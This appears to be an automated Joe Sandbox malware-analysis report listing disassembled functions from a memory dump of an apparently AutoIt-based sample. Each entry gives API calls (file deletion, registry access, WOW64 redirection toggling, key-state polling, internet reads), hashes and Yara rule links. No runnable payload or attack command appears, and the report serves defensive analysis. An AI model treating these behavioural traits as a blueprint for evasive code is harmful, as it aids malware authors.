Instruction ID: d61056507635f70b6ae6dff04baf55e26abf05c06857b22863afae0d974ed00d
Opcode Fuzzy Hash: 877c91f7298e537bbe44e1c2dc0f32a448e56f7f3a58cf77cccb0bdf0fd29497
Instruction Fuzzy Hash: C4F05530801B219BCB306B108C88AA93322BF12B01B59A068F887F6A14DB30CD84C6B6

Function 00D54E90 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E9C
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00D54EAE
FreeLibrary.KERNEL32(00000000,?,?,00D54EDD,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54EC0

Strings

kernel32.dll, xrefs: 00D54E94
Wow64DisableWow64FsRedirection, xrefs: 00D54EA8

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 4bf7f72647e4131257da9691a05bb42b544fda1dfd441073e4198e7b52fe7eed
Instruction ID: 6f946ef540772b23acff06cfa8bb0e640bb803e44b8f20e4d650c48f8b9aef3c
Opcode Fuzzy Hash: 4bf7f72647e4131257da9691a05bb42b544fda1dfd441073e4198e7b52fe7eed
Instruction Fuzzy Hash: 40E0CD35E117225FD6312B256C1DB5F6554AF82F677091115FC04E7300DF60CD4741B2

Function 00D54E59 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E62
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00D54E74
FreeLibrary.KERNEL32(00000000,?,?,00D93CDE,?,00E21418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00D54E87

Strings

Wow64RevertWow64FsRedirection, xrefs: 00D54E6E
kernel32.dll, xrefs: 00D54E5B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: 158605af7534828aee45067e7d0b30f56d759c3716f51ee85cd0695ba914f0c3
Instruction ID: d8baf82db4176228edd62cff670a4108f22f4569db9d60023d6660e7acdc3d84
Opcode Fuzzy Hash: 158605af7534828aee45067e7d0b30f56d759c3716f51ee85cd0695ba914f0c3
Instruction Fuzzy Hash: A4D0C231912B615B4A222B256C09D8F2A18AF81F163091114BC15E6210CF20CD4681F1

Function 00DC2947 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DC2C05
DeleteFileW.KERNEL32(?), ref: 00DC2C87
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00DC2C9D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DC2CAE
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00DC2CC0

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: af6674b8ead3c03707abf1f2c7713bc29144ad44da4ad80d2f26ce0768f07c43
Instruction ID: 16b4a0447572d28ac96ca19a7f947b2cfbbcd7745f0eb0f1302ebcf19b8ab649
Opcode Fuzzy Hash: af6674b8ead3c03707abf1f2c7713bc29144ad44da4ad80d2f26ce0768f07c43
Instruction Fuzzy Hash: 33B13E72D00119ABDF21DBA4CD85EEEBB7DEF49350F1040AAFA09E7155EA309A448F71

Function 00DDA387 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00DDA427
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00DDA435
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00DDA468
CloseHandle.KERNEL32(?), ref: 00DDA63D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: 059a3e02d846244759832de3a07149f91c8c366998672ae956ed7195325b4f60
Instruction ID: f6c6cee7d903424cd1c513c4718d71ae8f548156b93af0cda2b8f05eeda0fbae
Opcode Fuzzy Hash: 059a3e02d846244759832de3a07149f91c8c366998672ae956ed7195325b4f60
Instruction Fuzzy Hash: 36A180716043019FD720DF28D886F2AB7E5EF84714F14885DF9999B392DB70EC458BA1

Function 00D8BB27 Relevance: 7.7, APIs: 5, Instructions: 171timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00DF3700), ref: 00D8BB91
WideCharToMultiByte.KERNEL32(00000000,00000000,00E2121C,000000FF,00000000,0000003F,00000000,?,?), ref: 00D8BC09
WideCharToMultiByte.KERNEL32(00000000,00000000,00E21270,000000FF,?,0000003F,00000000,?), ref: 00D8BC36
_free.LIBCMT ref: 00D8BB7F

Part of subcall function 00D829C8: HeapFree.KERNEL32(00000000,00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000), ref: 00D829DE
Part of subcall function 00D829C8: GetLastError.KERNEL32(00000000,?,00D8D7D1,00000000,00000000,00000000,00000000,?,00D8D7F8,00000000,00000007,00000000,?,00D8DBF5,00000000,00000000), ref: 00D829F0

_free.LIBCMT ref: 00D8BD4B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID:
API String ID: 1286116820-0
Opcode ID: e0c6eac4d600dac7d2ea51597378136738fa6737df860d14a80c74344fb85c92
Instruction ID: 993510d2f27b97ee8eaeed33d7044439d089ffe6df78bb4d259b1bce640ca733
Opcode Fuzzy Hash: e0c6eac4d600dac7d2ea51597378136738fa6737df860d14a80c74344fb85c92
Instruction Fuzzy Hash: C851B872900209EFCB20FF759C819AEB7BCEB50320B1442ABF555E71A1EB309E459B70

Function 00DBE3FB Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00DBCF22,?), ref: 00DBDDFD

Part of subcall function 00DBDDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00DBCF22,?), ref: 00DBDE16

Part of subcall function 00DBE199: GetFileAttributesW.KERNEL32(?,00DBCF95), ref: 00DBE19A

lstrcmpiW.KERNEL32(?,?), ref: 00DBE473
MoveFileW.KERNEL32(?,?), ref: 00DBE4AC
_wcslen.LIBCMT ref: 00DBE5EB
_wcslen.LIBCMT ref: 00DBE603
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00DBE650

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: 33a18be13e600b0930b5a8debda8b12c45939c64abff7dd29490be2a48898f76
Instruction ID: dbfefa96ba78346052540866ffcd4fcf46ec781e1ef1187e2416de45235997a8
Opcode Fuzzy Hash: 33a18be13e600b0930b5a8debda8b12c45939c64abff7dd29490be2a48898f76
Instruction Fuzzy Hash: EB515FB24083859BC724EBA4D8919DBB3ECEF84340F44491EF68AD3151EF74E5888776

Function 00DDB9C9 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00D59CB3: _wcslen.LIBCMT ref: 00D59CBD

Part of subcall function 00DDC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00DDB6AE,?,?), ref: 00DDC9B5
Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDC9F1
Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA68
Part of subcall function 00DDC998: _wcslen.LIBCMT ref: 00DDCA9E

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00DDBAA5
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00DDBB00
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00DDBB63
RegCloseKey.ADVAPI32(?,?), ref: 00DDBBA6
RegCloseKey.ADVAPI32(00000000), ref: 00DDBBB3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: f5714712120460d05f4561a123f3da6c27749be4e41bc81ab0c9265180b0d6af
Instruction ID: 21c4fc118121dc091e695c2e7acd55ac7d213989215627de38e5e9140d629696
Opcode Fuzzy Hash: f5714712120460d05f4561a123f3da6c27749be4e41bc81ab0c9265180b0d6af
Instruction Fuzzy Hash: A1616D31208241EFD714DF14C490E2ABBE5FF84318F55955EF8998B292DB31ED45CBA2

Function 00DB8BB0 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00DB8BCD
VariantClear.OLEAUT32 ref: 00DB8C3E
VariantClear.OLEAUT32 ref: 00DB8C9D
VariantClear.OLEAUT32(?), ref: 00DB8D10
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00DB8D3B

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: ee8e631490b1bb29f4b986d176e88ecaa8c1197e296d500400ee865ddea46900
Instruction ID: c009b3d3278028af629c8f90fd11c5bb2c2fa37175d5e07f19b3b01eb4de2165
Opcode Fuzzy Hash: ee8e631490b1bb29f4b986d176e88ecaa8c1197e296d500400ee865ddea46900
Instruction Fuzzy Hash: 37516BB5A00219EFCB10CF58C894AAAB7F8FF89310B15855AE906DB350E730E911CBA0

Function 00DC8AFB Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00DC8BAE
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00DC8BDA
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00DC8C32
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00DC8C57
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00DC8C5F

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 2559164faa2b6109adaf8a3fee7de9add61b1e7220651e2ea9eb6c7943c62250
Instruction ID: f1db2bc78b01d92dbae96d90ab2f8125f7a10397d5a252c3553d2c4e3133c364
Opcode Fuzzy Hash: 2559164faa2b6109adaf8a3fee7de9add61b1e7220651e2ea9eb6c7943c62250
Instruction Fuzzy Hash: 68512635A00215AFCB05DF64C881E6ABBF5FF49315F088458E849AB362DB31ED55DBA0

Function 00DD8EE4 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00DD8F40
GetProcAddress.KERNEL32(00000000,?), ref: 00DD8FD0
GetProcAddress.KERNEL32(00000000,00000000), ref: 00DD8FEC
GetProcAddress.KERNEL32(00000000,?), ref: 00DD9032
FreeLibrary.KERNEL32(00000000), ref: 00DD9052

Part of subcall function 00D6F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00DC1043,?,75C0E610), ref: 00D6F6E6
Part of subcall function 00D6F6C9: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00DAFA64,00000000,00000000,?,?,00DC1043,?,75C0E610,?,00DAFA64), ref: 00D6F70D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: eda27845f8f23c1c6d49004e98120824acbbb0bf60b74dc1d41860c8b32f13ac
Instruction ID: 7342e94d726fe5133c44cde2cf6e4ddd017f8b7fea3f7a829624bbb8a1c51ebe
Opcode Fuzzy Hash: eda27845f8f23c1c6d49004e98120824acbbb0bf60b74dc1d41860c8b32f13ac
Instruction Fuzzy Hash: C5511C35604245DFCB15EF68C4948ADBBF1FF49324B088099EC559B362DB31ED86CBA1

Function 00DE6B76 Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00DE6C33
SetWindowLongW.USER32(?,000000EC,?), ref: 00DE6C4A
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00DE6C73
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00DCAB79,00000000,00000000), ref: 00DE6C98
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00DE6CC7

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 778cb02d509d489bb6ebe5cb06559716e90613b025e2dc7e9bbc54fb11282769
Instruction ID: 8088a6f6abc6c6cef08c15f68f194ad0cc789ca8dd34d83b5656255161022948
Opcode Fuzzy Hash: 778cb02d509d489bb6ebe5cb06559716e90613b025e2dc7e9bbc54fb11282769
Instruction Fuzzy Hash: 7C41A235604184AFD724EF2ACC95FA97FA5EB19390F280268F895A72A0C371ED41CA60

Function 00D82051 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00D820C3
_free.LIBCMT ref: 00D820E3

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 173cc2ff3f99e8109e19a3fdf0e6f853adf3038de8f0969399c47b11aca66cbf
Instruction ID: 176aa663490af3ee628567f1bb5e7fb92bf838ae81d4fe53be8a91efd2ec055f
Opcode Fuzzy Hash: 173cc2ff3f99e8109e19a3fdf0e6f853adf3038de8f0969399c47b11aca66cbf
Instruction Fuzzy Hash: 2141D472A00200AFCB24EF79C885A6DB7F5EF89314F254569E515EB396D731ED01CBA0

Function 00D6912D Relevance: 7.6, APIs: 5, Instructions: 121keyboardCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 00D69141
ScreenToClient.USER32(00000000,?), ref: 00D6915E
GetAsyncKeyState.USER32(00000001), ref: 00D69183
GetAsyncKeyState.USER32(00000002), ref: 00D6919D

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: AsyncState$ClientCursorScreen
String ID:
API String ID: 4210589936-0
Opcode ID: 204d090a8b171a3ec34117c01f6280cb931ccde3ba0e893e576b0b9cc9b38993
Instruction ID: b8f400ac3022d02d154b31467f3b36dd0dfc3130ce1419f29e6bacc0f1325dab
Opcode Fuzzy Hash: 204d090a8b171a3ec34117c01f6280cb931ccde3ba0e893e576b0b9cc9b38993
Instruction Fuzzy Hash: FA415F71A0870AEBDF15AF68C854BFEF7B8FB06320F244215E469A6290C7349955CBB1

Function 00DC3874 Relevance: 7.6, APIs: 5, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 00DC38CB
TranslateAcceleratorW.USER32(?,00000000,?), ref: 00DC3922
TranslateMessage.USER32(?), ref: 00DC394B
DispatchMessageW.USER32(?), ref: 00DC3955
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00DC3966

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchInputPeekState
String ID:
API String ID: 2256411358-0
Opcode ID: 8a542bc5e0604fa871f7fde3ca8c355d1e332907311eb06eb06c4efc9bbd3c17
Instruction ID: 90b930276ba547215a3d9f13e35479e669815400bc02cb3730906adb2bde76d8
Opcode Fuzzy Hash: 8a542bc5e0604fa871f7fde3ca8c355d1e332907311eb06eb06c4efc9bbd3c17
Instruction Fuzzy Hash: C331B9705043839EEB39CB759848FB637A4EB15304F08856DE452D7190EBB5968ACF31

Function 00DCCF1A Relevance: 7.6, APIs: 5, Instructions: 93networkfileCOMMON

Download Yara Rule

APIs

InternetQueryDataAvailable.WININET(?,?,00000000,00000000), ref: 00DCCF38
InternetReadFile.WININET(?,00000000,?,?), ref: 00DCCF6F
GetLastError.KERNEL32(?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCFB4
SetEvent.KERNEL32(?,?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCFC8
SetEvent.KERNEL32(?,?,00000000,?,?,?,00DCC21E,00000000), ref: 00DCCFF2

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498701404.0000000000E24000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_21_2_d50000_139d3265bb.jbxd

Similarity

API ID: EventInternet$AvailableDataErrorFileLastQueryRead
String ID:
API String ID: 3191363074-0
Opcode ID: aac89daf6f6a87e7bdf7d6b13b307c708f23b338bc296ddc779e49c92b343d8a
Instruction ID: 6708d017a1eb6977f6fa271887a2b6986c842211bdbd12678f6473279cba754a
Opcode Fuzzy Hash: aac89daf6f6a87e7bdf7d6b13b307c708f23b338bc296ddc779e49c92b343d8a
Instruction Fuzzy Hash: 34316D71915706AFDB20DFA5D884EAABBFAEF04310B14542EF65AD7200D730ED419B70

Function 00DB1901 Relevance: 7.6, APIs: 5, Instructions: 93sleepwindowCOMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00DB1915
PostMessageW.USER32(00000001,00000201,00000001), ref: 00DB19C1
Sleep.KERNEL32(00000000,?,?,?), ref: 00DB19C9
PostMessageW.USER32(00000001,00000202,00000000), ref: 00DB19DA
Sleep.KERNEL32(00000000,?,?,?,?), ref: 00DB19E2

Memory Dump Source

Source File: 00000015.00000002.1498418329.0000000000D51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D50000, based on PE: true

Associated: 00000015.00000002.1498393405.0000000000D50000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000DEC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498486668.0000000000E12000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000015.00000002.1498545372.0000000000E1C000.00000004.00000001.01000000.0000000A.sdmpDownload File
